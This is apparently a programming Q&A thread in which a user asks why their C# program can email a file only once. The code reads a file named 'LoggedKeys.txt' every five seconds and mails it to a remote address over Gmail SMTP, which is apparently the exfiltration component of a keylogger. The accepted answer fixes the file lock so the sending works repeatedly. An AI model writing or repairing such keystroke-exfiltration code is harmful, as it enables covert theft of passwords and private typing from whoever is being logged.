# Procces cannot acces the file

Tags: c#, .net

Getting this error, but I dont know where is the problem.

My program sends me email only once and then complains about the file that can't be accessed, because it's already being used by another process. I already tried to close the stream in the using directive, but that doesn't help.

Here is the code:

```
using System;
using System.IO;
using System.Net.Mail;
using System.Threading;
using System.Runtime.InteropServices;
using System.Net.Mail;

namespace MailSender
{
    class Program
    {
        static void Main(string[] args)
        {
            while (true)
            {
                Thread.Sleep(5000);
                SendMail();
            }
        }

        static void SendMail()
        {
            String newFilePath = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
            string filePath = newFilePath + @"\Info\";
            string newFilePath2 = (@filePath + "LoggedKeys.txt");



            SmtpClient client = new SmtpClient("smtp.gmail.com", 587);
            MailMessage logMessage = new MailMessage();
            logMessage.From = new MailAddress("...");
            logMessage.To.Add("...");
            logMessage.Subject = "123xt";

            client.UseDefaultCredentials = false;
            client.EnableSsl = true;
            client.Credentials = new System.Net.NetworkCredential("...", "...");

            string newFile = File.ReadAllText(newFilePath2);
            System.Threading.Thread.Sleep(2);
            string a = filePath + @"\a.txt";
            using (StreamWriter sw = new StreamWriter(a, true))
            {
                sw.WriteLine(newFile);

            }

            System.Threading.Thread.Sleep(2);
            logMessage.Attachments.Add(new Attachment(a));

            client.Send(logMessage);

            logMessage = null;

        }
    }
}
```

Can someone help?

Comment: @mjwills this line: using (StreamWriter sw = new StreamWriter(a, true)), Error: the process cannot access the file...

Answer (score 0, accepted):

You need to `Dispose` the `logMessage` and `client` to ensure it releases all file locks.

This can be achieved using:

```
using (SmtpClient client = new SmtpClient("smtp.gmail.com", 587))
using (MailMessage logMessage = new MailMessage())
{
```

Comment: Thank you so much, this helped a lot